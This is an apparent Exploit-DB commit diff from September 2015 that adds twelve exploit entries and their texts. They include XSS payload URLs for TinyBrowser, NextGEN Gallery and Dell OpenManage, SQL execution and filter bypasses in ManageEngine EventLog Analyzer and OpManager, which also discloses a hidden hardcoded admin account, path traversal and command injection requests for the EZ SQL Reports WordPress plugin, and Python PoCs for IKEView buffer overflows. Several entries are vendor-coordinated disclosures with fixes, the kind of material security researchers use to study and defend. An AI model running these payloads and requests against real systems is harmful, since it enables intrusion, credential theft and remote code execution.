DB: 2015-09-15

12 new exploits

files.csv

@@ -34465,9 +34465,21 @@ id,file,description,date,author,platform,type,port
 38162,platforms/php/webapps/38162.txt,"osTicket tickets.php status Parameter XSS",2013-01-02,AkaStep,php,webapps,0
 38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin Arbitrary File Upload Vulnerability",2013-01-03,"Sammy FORGIT",php,webapps,0
 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default WPS PIN Security Vulnerability",2013-01-03,ZhaoChunsheng,hardware,remote,0
+38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0
 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 Insecure Cookie Authentication Bypass Vulnerability",2012-12-31,Agd_Scorp,php,webapps,0
 38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes Arbitrary File Upload Vulnerability",2013-01-04,JingoBD,php,webapps,0
 38168,platforms/php/webapps/38168.txt,"TomatoCart 'json.php' Security Bypass Vulnerability",2013-01-04,"Aung Khant",php,webapps,0
 38169,platforms/php/webapps/38169.txt,"Havalite CMS 'comment' Parameter HTML Injection Vulnerability",2013-01-06,"Henri Salo",php,webapps,0
 38170,platforms/android/remote/38170.txt,"Facebook for Android 'LoginActivity' Information Disclosure Vulnerability",2013-01-07,"Takeshi Terada",android,remote,0
 38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0
+38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross Site Scripting Vulnerability",2013-01-08,Am!r,php,webapps,0
+38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0
+38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
+38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator Cross Site Scripting Vulnerability",2013-01-09,"Tenable NS",multiple,remote,0
+38180,platforms/php/webapps/38180.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
+38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
+38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0
+38181,platforms/php/webapps/38181.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/upload.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
+38182,platforms/php/webapps/38182.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
+38183,platforms/php/webapps/38183.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
+38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0

platforms/multiple/remote/38179.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57212/info
+
+Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable. 
+
+https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/) 

platforms/multiple/webapps/38173.txt

@@ -0,0 +1,92 @@
+Exploit Title: ManageEngine EventLog Analyzer SQL query execution
+Product: ManageEngine EventLog Analyzer
+Vulnerable Versions: v10.6 build 10060 and previous versions
+Tested Version: v10.6 build 10060 (Windows)
+Advisory Publication: 14/09/2015
+Vulnerability Type: authenticated SQL query execution
+Credit: xistence <xistence[at]0x90.nl>
+
+Product Description
+-------------------
+
+EventLog Analyzer carry out logs analysis for all Windows, Linux and Unix
+systems, Switches and Routers (Cisco), other Syslog supporting devices, and
+applications like IIS, MS SQL. Eventlog analyzer application is capable of
+performing real-time log file analysis. Event log files analyzer
+application can carry out log file analysis of imported files. The files
+can be imported from the archive or from any machine.
+
+When an important security event is generated on a machine in the network,
+event log file analyser application collects, performs log analysis and
+displays the event on the EventLog Analyzer Dashboard, in real-time. The
+event log report is generated from the analyzed event logs. From the event
+log reports (graphs), you can drill down to the raw log events and do a
+root cause analysis within minutes, and then focus on resolving it.
+
+The logging analyser application carry out imported and archived log files
+analyses to fulfill the requirements of forensic analysis and event log
+audit. The forensic and audit reports can be generated from the analyzed
+logs.
+
+
+Vulnerability Details
+---------------------
+
+Every user has the ability to execute SQL queries through the
+"/event/runQuery.do" script, including the default "guest" user. (The SQL
+query option is just not visible in the web interface)
+Below is the POST request, executed as "guest":
+
+POST /event/runQuery.do HTTP/1.1
+Host: 192.168.2.116:8400
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=XXXXXXXXXX
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+
+execute=true&query=select+version%28%29
+
+
+Access to queries starting with "INSERT" or "UPDATE" is denied by default,
+however this can be bypassed by doing a select query first, like this:
+
+"SELECT 1;INSERT INTO ..."
+
+The included Postgres backend is running with SYSTEM privileges on Windows,
+allowing to write files to disk with these privileges.
+
+A Metasploit exploit module will be released shortly.
+
+
+Solution
+--------
+ManageEngine has provided a patch to fix this issue, the steps to apply/fix
+this are as below:
+
+1. Stop the ELA service.
+2. Download the zip from
+http://bonitas2.zohocorp.com/zipUploads/2015_14_07_17_52_30_o_19q686iqs1sfemdf19e05sqre61.tar.gz
+and extract the folders. You would have two folders "EventLogAnalyzerJSP"
+and "LogAnalyzerClient"  under "o_19q686iqs1sfemdf19e05sqre61". Copy these
+two folders and place it under <ELA Home>//lib/ folder.
+3. The path of the following files would be as below:
+
+runQuery_jsp.class --> <ELA
+Home>\\lib\\EventLogAnalyzerJSP\\com\\adventnet\\sa\\jsp\\WEB_002dINF\\jsp
+RunQuery.class --> <ELA Home>\\lib\\LogAnalyzerClient\\com\\adventnet\\la\
+
+4. Restart the ELA service and check for the issue.
+
+
+Advisory Timeline
+-----------------
+
+07/11/2015 - Discovery and vendor notification
+07/13/2015 - ManageEngine acknowledged issue
+07/14/2015 - ManageEngine supplied fix
+07/16/2015 - Verified fix and replied back to ManageEngine that the issue
+has been resolved
+09/14/2015 - Public disclosure

platforms/multiple/webapps/38174.txt

@@ -0,0 +1,82 @@
+Exploit Title: ManageEngine OpManager multiple vulnerabilities
+Product: ManageEngine OpManager
+Vulnerable Versions: v11.5 and previous versions
+Tested Version: v11.5 (Windows)
+Advisory Publication: 14/09/2015
+Vulnerability Type: hardcoded credentials, SQL query protection bypass
+Credit: xistence <xistence[at]0x90.nl>
+
+
+Product Description
+-------------------
+
+ManageEngine OpManager is a network, server, and virtualization monitoring
+software that helps SMEs, large enterprises and service providers manage
+their data centers and IT infrastructure efficiently and cost effectively.
+Automated workflows, intelligent alerting engines, configurable discovery
+rules, and extendable templates enable IT teams to setup a 24x7 monitoring
+system within hours of installation.
+Do-it-yourself plug-ins extend the scope of management to include network
+change and configuration management and IP address management as well as
+monitoring of networks, applications, databases, virtualization and
+NetFlow-based bandwidth.
+
+
+Vulnerability Details
+---------------------
+
+ManageEngine OpManager ships with a default account "IntegrationUser" with
+the password "plugin". This account is hidden from the user interface and
+will never show up in the user management. Also changing the password for
+this account is not possible by default. The account however is assigned
+Administrator privileges and logging in with this account is possible via
+the web interface.
+
+Below you can see the account in the PostgreSQL database after a fresh
+installation:
+
+C:\ManageEngine\OpManager\pgsql\bin>psql.exe -h 127.0.0.1 -p 13306 -U
+postgres -d OpManagerDB
+psql (9.2.4)
+
+OpManagerDB=# select * from userpasswordtable where userid = 2;
+userid | username | password | ownername | domainname | sipenabled
+--------+-----------------+-----------+-----------+------------+------------
+2 | IntegrationUser | d7962CgyJ | NULL | NULL | false
+(1 row)
+
+The above password decrypted is "plugin".
+
+Any account that has access to the web interface with Administrator rights
+can use a web form (/api/json/admin/SubmitQuery) to execute SQL queries on
+the backend PostgreSQL instance.
+By default restrictions apply and queries that start with
+INSERT/UPDATE/DELETE are not allowed to be executed, this is however very
+easy to bypass by using something like "INSERT/**/INTO...". The "/**/"
+comment will create a space and the function is not detected by OpManager's
+protection and will be executed.
+
+The PostgreSQL environment runs as SYSTEM under Windows. By writing a WAR
+payload to the "tomcat/webroot" directory, the WAR payload will be deployed
+automatically and will give a shell with SYSTEM privileges.
+
+A metasploit module will be release shortly.
+
+
+Solution
+--------
+
+ManageEngine has provided a patch to fix this issue:
+https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability
+
+
+Advisory Timeline
+-----------------
+
+05/17/2015 - Discovery and vendor notification
+05/22/2015 - ManageEngine acknowledged issue
+07/10/2015 - Requested status update
+07/17/2015 - ManageEngine supplied fix
+07/24/2015 - ManageEngine provied definitive fix at
+https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability
+09/14/2015 - Public disclosure

platforms/php/webapps/38176.txt

@@ -0,0 +1,80 @@
+# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary File Download (admin/colaborator required)
+# Google Dork: -
+# Date: 12/09/2015
+# Exploit Author: Felipe Molina (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
+# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
+# Version: < 4.11.33, fixed in 4.11.37
+# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
+# CVE : N/A
+#
+# Summary: The plugin allows a wordpress site administrator or
+collaborator to download arbitrary files from the host file system
+though the plugin functionality of downloading .sql, .sql.zip or
+.sql.gz files created by the wordpress administrator.
+# The file name to download is not sanitized and path traversal can be
+injected in the request.
+#
+# Timeline:
+# - 09/09/2015: Fist contact with the author
+# - 11/09/2015: Author creates fix and communicate to me
+# - 12/09/2015: Public release of the new plugin version
+
+# POC: To retrieve the wp-config.php file:
+
+GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php
+HTTP/1.1
+Host: <the host with the wordpress>
+Proxy-Connection: keep-alive
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Upgrade-Insecure-Requests: 1
+User-Agent: <User-Agent>
+Referer: http://<the host with the
+wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings
+Accept-Encoding: gzip, deflate, sdch
+Accept-Language: en-US,en;q=0.8,es;q=0.6
+Cookie: wordpress_[...etc...]4af418c3efd
+
+
+# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary Code Execution (admin/colaborator required)
+# Google Dork: -
+# Date: 12/09/2015
+# Exploit Author: Felipe Molina (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
+# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
+# Version: < 4.11.33, fixed in 4.11.37
+# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
+# CVE : N/A
+#
+# Summary: There are several calls to "passtthru" in the code, one of
+them is receiving the username, password, database name and host from
+the $_POST arguments, so you can inject in every of this parameter the
+";" character or others like "&&" or "||" to execute other distinct
+commands to "/usr/bin/mysql"
+#
+# Timeline:
+# - 09/09/2015: Fist contact with the author
+# - 11/09/2015: Author creates fix and communicate to me
+# - 12/09/2015: Public release of the new plugin version
+
+# POC: Send a POST request like this to obtain in the folder wp-admin
+a file with name "testrce.txt". The parameters DB_NAME, DB_HOST,
+DB_USER, and DB_PASSWORD are injectable:
+
+POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
+Host: <wordpress web>
+Proxy-Connection: keep-alive
+Content-Length: 177
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Origin: http://<wordpress web>
+Upgrade-Insecure-Requests: 1
+User-Agent: <the user agent>
+Content-Type: application/x-www-form-urlencoded
+Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8,es;q=0.6
+Cookie: wordpress_8fa[...etc...]b7d
+
+DB_NAME=<the db
+name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86

platforms/php/webapps/38178.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/57200/info
+
+The NextGEN Gallery plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+NextGEN Gallery 1.9.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss] 

platforms/php/webapps/38180.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57230/info
+
+TinyBrowser is prone to multiple vulnerabilities.
+
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) 

platforms/php/webapps/38181.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57230/info
+ 
+TinyBrowser is prone to multiple vulnerabilities.
+ 
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)// 

platforms/php/webapps/38182.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57230/info
+  
+TinyBrowser is prone to multiple vulnerabilities.
+  
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) 

platforms/php/webapps/38183.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57230/info
+   
+TinyBrowser is prone to multiple vulnerabilities.
+   
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type= 

platforms/php/webapps/38184.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/57230/info
+    
+TinyBrowser is prone to multiple vulnerabilities.
+    
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type= 

platforms/windows/dos/38165.txt

@@ -0,0 +1,143 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt
+
+
+
+Vendor:
+================================
+www.checkpoint.com
+
+
+
+Product:
+================================
+IKEView.exe Fox beta 1
+
+IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall
+phase(1 & 2) packets being exchanged with switches and gateways.
+
+
+
+Vulnerability Type:
+======================
+Stack Buffer Overflow
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+IKEView.exe is vulnerable to local stack based buffer overflow when parsing
+an malicious (internet key exchange) ".elg" file.
+Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after
+IKEView parses our malicious file, which may result then
+result in arbitrary attacker supplied code execution.
+
+
+quick GDB register dump:
+------------------------
+
+EAX 00000000
+ECX 41414141
+EDX 7774B4AD ntdll.7774B4AD
+EBX 00000000
+ESP 0018E0E0
+EBP 0018E100
+ESI 00000000
+EDI 00000000
+EIP 41414141
+C 0 ES 002B 32bit 0(FFFFFFFF)
+P 1 CS 0023 32bit 0(FFFFFFFF)
+A 0 SS 002B 32bit 0(FFFFFFFF)
+Z 1 DS 002B 32bit 0(FFFFFFFF)
+S 0 FS 0053 32bit 7EFDD000(FFF)
+T 0 GS 002B 32bit 0(FFFFFFFF)
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+
+-----------SEH Chain---------
+
+0:000> !exchain
+0018f870: 42424242
+Invalid exception stack at 41414141
+0:000>
+0018f870: 42424242
+Invalid exception stack at 41414141
+0:000>
+
+0018F868 |02004AE0 àJ. ASCII "File loaded in 08 minutes, 01 seconds."
+0018F86C |41414141 AAAA
+0018F870 |41414141 AAAA Pointer to next SEH record
+0018F874 |42424242 BBBB SE handler
+
+
+Quick Buffer Overflow POC :
+===========================
+
+
+1) Below python file to create POC save as .py it will generate POC file,
+open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!
+
+seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B'
+ASCII char.
+
+file="C:\\IKEView-buffer-overflow.elg"
+x=open(file,"w")
+payload="A"*4444+seh
+x.write(payload)
+x.close()
+
+print "\n=======================================\n"
+print " IKEView-buffer-overflow.elg file created\n"
+print " hyp3rlinx ..."
+print "=========================================\n"
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+
+Vulnerable Product: [+] IKEView.exe Fox beta 1
+
+
+Vulnerable File Type: [+] .elg
+
+
+Affected Area(s): [+] Local OS
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx

platforms/windows/dos/38177.txt

@@ -0,0 +1,143 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
+
+
+
+Vendor:
+================================
+www.checkpoint.com
+http://pingtool.org/downloads/IKEView.exe
+
+
+
+Product:
+==================================================
+IKEView.exe Feature Pack NGX R60 - Build 591000004
+
+IKEVIew.EXE is used to inspect - internet private key exchanges on the
+Firewall
+phase(1 & 2) packets being exchanged with switches and gateways.
+
+
+IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting
+purposes.
+It is a Windows executable that can be downloaded from Checkpoint.com.
+This file parses the IKE.elg file located on the firewall.
+
+To use IKEVIEW for VPN troubleshooting do the following:
+
+1. From the checkpoint firewall type the following:
+
+vpn debug ikeon
+
+This will create the IKE.elg file located in $FWDIR/log
+
+
+2. Attempt to establish the VPN tunnel. All phases of the connection will
+be logged to the IKE.elg file.
+
+
+3. SCP the file to your local desktop.
+WINSCP works great
+
+4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.
+
+
+
+Vulnerability Type:
+======================
+Stack Buffer Overflow
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+IKEView.exe is vulnerable to local stack based buffer overflow when parsing
+an malicious (internet key exchange) ".elg" file.
+Vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after
+IKEView parses our malicious file, which may result then
+result in arbitrary attacker supplied code execution.
+
+Tested on Windows SP1
+
+
+0018F868  |41414141  AAAA
+0018F86C  |01FC56D0  ÐVü  ASCII "File loaded in 47 minutes, 00 seconds."
+0018F870  |41414141  AAAA
+0018F874  |41414141  AAAA  Pointer to next SEH record
+0018F878  |42424242  BBBB  SE handler
+0018F87C  |00000002   ...
+
+
+Quick Buffer Overflow POC :
+===========================
+
+
+1) Below python file to create POC save as .py it will generate POC file,
+open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!
+
+seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B'
+ASCII char.
+
+file="C:\\IKEView-R60-buffer-overflow.elg"
+x=open(file,"w")
+payload="A"*4428+seh
+x.write(payload)
+x.close()
+
+print "\n=======================================\n"
+print " IKEView-R60-buffer-overflow.elg file created\n"
+print " hyp3rlinx ..."
+print "=========================================\n"
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+
+Vulnerable Product:             [+] IKEView.exe Feature Pack NGX R60 -
+Build 591000004
+
+
+Vulnerable File Type:           [+] .elg
+
+
+Affected Area(s):               [+] Local OS
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx